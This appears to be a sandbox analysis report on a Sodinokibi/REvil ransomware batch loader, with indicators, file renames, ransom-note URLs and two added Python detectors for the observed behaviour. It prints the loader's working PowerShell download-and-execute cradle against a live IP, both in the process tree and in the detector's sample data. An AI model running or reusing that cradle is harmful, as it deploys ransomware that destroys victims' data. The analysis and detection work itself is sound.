Analysis

max time kernel:   146s
max time network:  149s
platform:          windows10_x64
resource:          win10v200722
submitted:         21-08-2020 23:10
Tasks

Static task:      static1

Behavioral task:  behavioral1
  Sample:    59757318723e5bcf0dc7acb1e50a016f.bat
  Resource:  win7v200722

Behavioral task:  behavioral2
  Sample:    59757318723e5bcf0dc7acb1e50a016f.bat
  Resource:  win10v200722

The results below are from the win10v200722 run (behavioral2), as the Analysis block shows.
General

Target:  59757318723e5bcf0dc7acb1e50a016f.bat
Size:    220B
MD5:     3ce440975e6a9f2c1b282370f89d2c24
SHA1:    78649de7adceedaf9701fee3ae23b048df1ae0fb
SHA256:  32fd1da6b6ea751505cb7a81d90fc2f0925a62a78c917262e96fee968b627474
SHA512:  179853fc7cb0339b71778d815c0c2834027bc942a70a832149ce62ce0bd05f99222032affe9c07e01542071dc2ca11343d45ee29945bc6d19cee9d4679953188

Note that the file name is not the sample's MD5; it matches the paste identifier in the download URL below.
Malware Config

Extracted (download URL used by the PowerShell one-liner in the process tree)
  http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f

Extracted (ransom note)
  Path:    C:\atmf00-readme.txt
  Family:  sodinokibi
  URLs:    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C1895CC9C2E527E
           http://decryptor.cc/2C1895CC9C2E527E
Signatures

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
  Processes:
    flow 1   PID 1020   powershell.exe
Modifies extensions of user files (10 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
    File opened for modification  \??\c:\users\admin\pictures\LockBackup.tiff
    File opened for modification  \??\c:\users\admin\pictures\RedoHide.tiff
    File renamed  C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.atmf00
    File renamed  C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.atmf00
    File opened for modification  \??\c:\users\admin\pictures\ResolveFind.tiff
    File renamed  C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.atmf00
    File renamed  C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.atmf00
    File renamed  C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.atmf00
    File renamed  C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.atmf00
    File renamed  C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.atmf00
  Every rename keeps the original file name and appends ".atmf00"; the same string is the prefix of the ransom note name (atmf00-readme.txt).
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  vssvc.exe is the Volume Shadow Copy service; these Diag keys are written when it starts and initialises its writers. The service starting during an encryption run is consistent with the sample touching shadow copies, but the report does not capture the call that started it (for example a vssadmin or WMI request), so shadow copy deletion is not confirmed by this page.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c15jqxwg56.bmp"
Drops file in Program Files directory (37 IoCs)
  Processes: powershell.exe
    File created  \??\c:\program files (x86)\atmf00-readme.txt
    File created  \??\c:\program files\atmf00-readme.txt
    File opened for modification  \??\c:\program files\ImportCopy.asx
    File opened for modification  \??\c:\program files\InitializeReceive.wmf
    File opened for modification  \??\c:\program files\ResumeOptimize.docm
    File opened for modification  \??\c:\program files\SaveInvoke.i64
    File opened for modification  \??\c:\program files\SuspendMerge.3gp
    File opened for modification  \??\c:\program files\ApproveMove.M2TS
    File opened for modification  \??\c:\program files\GroupConfirm.mpeg3
    File opened for modification  \??\c:\program files\InitializeResume.emz
    File opened for modification  \??\c:\program files\OutSet.rtf
    File opened for modification  \??\c:\program files\ShowPing.3g2
    File opened for modification  \??\c:\program files\BlockConvertTo.crw
    File opened for modification  \??\c:\program files\EnableConnect.m4v
    File opened for modification  \??\c:\program files\RegisterDebug.asp
    File opened for modification  \??\c:\program files\UnpublishHide.doc
    File opened for modification  \??\c:\program files\UnpublishStop.wmv
    File opened for modification  \??\c:\program files\AssertSuspend.avi
    File opened for modification  \??\c:\program files\DisableTest.mpeg
    File opened for modification  \??\c:\program files\FormatOut.jtx
    File opened for modification  \??\c:\program files\GrantClear.vsdm
    File opened for modification  \??\c:\program files\DisconnectUnblock.raw
    File opened for modification  \??\c:\program files\PingUnregister.clr
    File opened for modification  \??\c:\program files\ReadDisable.inf
    File opened for modification  \??\c:\program files\SelectRedo.ADT
    File opened for modification  \??\c:\program files\SplitMount.ini
    File opened for modification  \??\c:\program files\SuspendConvertFrom.vdw
    File opened for modification  \??\c:\program files\CheckpointDismount.vst
    File opened for modification  \??\c:\program files\CompleteMount.txt
    File opened for modification  \??\c:\program files\DebugConvertFrom.pcx
    File opened for modification  \??\c:\program files\MeasureRestore.ppsm
    File opened for modification  \??\c:\program files\MeasureSkip.eps
    File opened for modification  \??\c:\program files\LimitUse.i64
    File opened for modification  \??\c:\program files\OutRevoke.pub
    File opened for modification  \??\c:\program files\DebugUninstall.ogg
    File opened for modification  \??\c:\program files\InstallEdit.txt
    File opened for modification  \??\c:\program files\LimitShow.aifc
  Two of the 37 entries are the ransom note being written into each Program Files root; the other 35 are data files opened for in-place modification.
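The "Modifies extensions of user files" and "Drops file in Program Files directory" signatures above can be correlated mechanically: REvil/Sodinokibi appends one random extension to every encrypted file and names its note "<extension>-readme.txt". The following Python is an added example, not part of the sandbox report or of any vendor's detection code. It parses IoC lines in the report's own "File renamed OLD => NEW PROCESS" / "File created PATH PROCESS" format; the powershell.exe input lines are copied from the two sections above, the explorer.exe line is a constructed benign control, and the rename threshold of 5 is an assumption chosen for the example.

```python
import re
from collections import defaultdict

# The report lists file operations as "File renamed OLD => NEW PROCESS" and
# "File created PATH PROCESS"; paths may contain spaces, the process name does not.
RENAME_RX = re.compile(r"^File renamed (?P<old>.+?) => (?P<new>.+) (?P<proc>\S+)$")
CREATE_RX = re.compile(r"^File created (?P<path>.+) (?P<proc>\S+)$")

RANSOMWARE_MIN_RENAMES = 5   # assumed threshold for this example


def normalize(path):
    """Lowercase and strip the NT object-manager prefix the sandbox logs."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def appended_extension(old, new):
    """Return EXT when NEW is exactly OLD + '.EXT' (original name kept), else None."""
    o, n = normalize(old), normalize(new)
    if n.startswith(o + ".") and "." not in n[len(o) + 1:]:
        return n[len(o) + 1:]
    return None


def triage(ioc_lines):
    """Group renames and created files per process and decide whether the
    pattern (many files renamed to one appended extension plus a matching
    <ext>-readme.txt note) looks like REvil-style ransomware."""
    renames = defaultdict(list)   # process -> [(old, new, appended ext or None)]
    created = defaultdict(list)   # process -> [normalized path]
    for line in ioc_lines:
        line = line.strip()
        m = RENAME_RX.match(line)
        if m:
            renames[m["proc"]].append((m["old"], m["new"], appended_extension(m["old"], m["new"])))
            continue
        m = CREATE_RX.match(line)
        if m:
            created[m["proc"]].append(normalize(m["path"]))
        # "File opened for modification" lines carry no rename information; ignored.

    report = {}
    for proc in sorted(set(renames) | set(created)):
        ext_counts = defaultdict(int)
        for _, _, ext in renames[proc]:
            if ext:
                ext_counts[ext] += 1
        dominant = max(ext_counts, key=ext_counts.get) if ext_counts else None
        # REvil/Sodinokibi drops "<appended extension>-readme.txt" in the
        # directories it encrypts, so the note name is tied to the extension.
        notes = []
        if dominant:
            notes = sorted(p for p in created[proc] if p.endswith("\\" + dominant + "-readme.txt"))
        ransomware_like = (dominant is not None
                           and ext_counts[dominant] >= RANSOMWARE_MIN_RENAMES
                           and bool(notes))
        report[proc] = {
            "renamed": len(renames[proc]),
            "extension": dominant,
            "same_ext_renames": ext_counts.get(dominant, 0),
            "ransom_notes": notes,
            "verdict": "ransomware-like" if ransomware_like else "inconclusive",
        }
    return report


# Input lines copied from the report's "Modifies extensions of user files" and
# "Drops file in Program Files directory" sections; the explorer.exe line is a
# constructed benign control.
SAMPLE_IOCS = [
    r"File opened for modification \??\c:\users\admin\pictures\LockBackup.tiff powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.atmf00 powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.atmf00 powershell.exe",
    r"File created \??\c:\program files (x86)\atmf00-readme.txt powershell.exe",
    r"File created \??\c:\program files\atmf00-readme.txt powershell.exe",
    r"File renamed C:\Users\Admin\Documents\draft.docx => \??\c:\users\admin\documents\final.docx explorer.exe",
]

if __name__ == "__main__":
    for proc, result in triage(SAMPLE_IOCS).items():
        print(proc, result)
```

On the report's lines this yields extension "atmf00", seven same-extension renames and both note paths for powershell.exe, while the explorer.exe rename (a plain name change, no appended extension) stays inconclusive.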
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe (PID 1020), 5 occurrences
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes:
    powershell.exe (PID 1020)  Token: SeDebugPrivilege
    powershell.exe (PID 1020)  Token: SeDebugPrivilege
    powershell.exe (PID 1020)  Token: SeTakeOwnershipPrivilege
    vssvc.exe (PID 3880)       Token: SeBackupPrivilege
    vssvc.exe (PID 3880)       Token: SeRestorePrivilege
    vssvc.exe (PID 3880)       Token: SeAuditPrivilege
  The powershell.exe entries are the ones of interest: SeDebugPrivilege and SeTakeOwnershipPrivilege are not needed for ordinary scripting. The vssvc.exe entries are the backup and restore privileges the VSS service normally enables for itself.
Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    PID 3984 (cmd.exe) wrote to memory of PID 1020 (powershell.exe)
    PID 3984 (cmd.exe) wrote to memory of PID 1020 (powershell.exe)
    PID 3984 (cmd.exe) wrote to memory of PID 1020 (powershell.exe)
  All three writes are from the parent into the child it just created, which is what a parent process shows when spawning a child; on their own they are not evidence of injection.
Processes

C:\Windows\system32\cmd.exe  (PID 3984)
  Command line:  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\59757318723e5bcf0dc7acb1e50a016f.bat"
  Signatures:    Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1020, child of 3984)
    Command line:  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f');Invoke-CIGRXCCUEVHBH;Start-Sleep -s 10000"
    Signatures:    Blacklisted process makes network request
                   Modifies extensions of user files
                   Sets desktop wallpaper using registry
                   Drops file in Program Files directory
                   Suspicious behavior: EnumeratesProcesses
                   Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe  (PID 3880)
  Command line:  C:\Windows\system32\vssvc.exe
  Signatures:    Modifies service
                 Suspicious use of AdjustPrivilegeToken

The 220-byte batch file does nothing but start this one-liner. It explicitly uses the 32-bit PowerShell host (SysWOW64 path on a 64-bit platform), fetches the paste over plain HTTP, evaluates it in memory with IEX, calls Invoke-CIGRXCCUEVHBH (a function presumably defined by the downloaded text, since nothing else in the chain defines it), and then sleeps for 10000 seconds so the host process stays alive while the payload runs. All ransomware behaviour in this report is attributed to that single powershell.exe process; no payload is written to disk as an executable.
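Detection logic for the launch chain above, as an added Python example that is not part of the sandbox report or of any vendor tool. It walks process-creation events, flags a powershell.exe command line that evaluates downloaded content (IEX plus a WebClient Download* call), pulls out the URL, the Invoke-* function name and the Start-Sleep duration, and records whether the parent was cmd.exe running a .bat. The cmd.exe and powershell.exe command lines are copied from the process tree; the two benign powershell.exe events, the parent PID of cmd.exe and the example.invalid host are constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Indicators of a PowerShell download cradle; case-insensitive because
# PowerShell cmdlet and .NET member names are.
IEX_RX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_RX = re.compile(r"\.download(?:string|data|file)\s*\(", re.I)
URL_RX = re.compile(r"https?://[^\s'\")]+", re.I)
# Any Invoke-* other than Invoke-Expression: the function the downloaded
# script defines and the one-liner then calls (Invoke-CIGRXCCUEVHBH here).
INVOKE_RX = re.compile(r"\b(invoke-(?!expression\b)[a-z0-9]+)\b", re.I)
SLEEP_RX = re.compile(r"start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def analyze_cmdline(cmdline: str) -> Optional[dict]:
    """Return cradle details when cmdline evaluates downloaded content, else None."""
    if not (IEX_RX.search(cmdline) and DOWNLOAD_RX.search(cmdline)):
        return None
    url = URL_RX.search(cmdline)
    inv = INVOKE_RX.search(cmdline)
    slp = SLEEP_RX.search(cmdline)
    return {
        "url": url.group(0) if url else None,
        "invoked_function": inv.group(1) if inv else None,
        "sleep_seconds": int(slp.group(1)) if slp else 0,
    }


def detect_cradles(events):
    """Flag powershell.exe events whose command line is a download cradle and
    record whether the parent was cmd.exe running a .bat, as in this report."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not e.image.lower().endswith("powershell.exe"):
            continue
        details = analyze_cmdline(e.cmdline)
        if details is None:
            continue
        parent = by_pid.get(e.ppid)
        launched_by_bat = (parent is not None
                           and parent.image.lower().endswith("cmd.exe")
                           and ".bat" in parent.cmdline.lower())
        findings.append({"pid": e.pid, "ppid": e.ppid,
                         "launched_by_bat": launched_by_bat, **details})
    return findings


# Constructed process-creation events. The first two command lines are copied
# from the report's process tree; the last two are benign controls (one runs
# no download, one downloads a file without evaluating it).
PS_CMDLINE = ('C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
              '"IEX (New-Object System.Net.WebClient).DownloadString('
              "'http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f');"
              'Invoke-CIGRXCCUEVHBH;Start-Sleep -s 10000"')

SAMPLE_EVENTS = [
    ProcEvent(3984, 1, "C:\\Windows\\system32\\cmd.exe",
              'C:\\Windows\\system32\\cmd.exe /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\59757318723e5bcf0dc7acb1e50a016f.bat"'),
    ProcEvent(1020, 3984, "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", PS_CMDLINE),
    ProcEvent(2200, 3984, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'),
    ProcEvent(2300, 900, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe \"(New-Object Net.WebClient).DownloadFile('http://updates.example.invalid/x.zip','x.zip')\""),
]

if __name__ == "__main__":
    for finding in detect_cradles(SAMPLE_EVENTS):
        print(finding)
```

Requiring both IEX and a Download* call keeps a plain file download (the fourth event) out of the results; the extracted URL, function name and sleep duration are what an analyst would pivot on next (block the host, search other endpoints for the same Invoke-* name, hunt for long-sleeping 32-bit PowerShell hosts spawned from batch files).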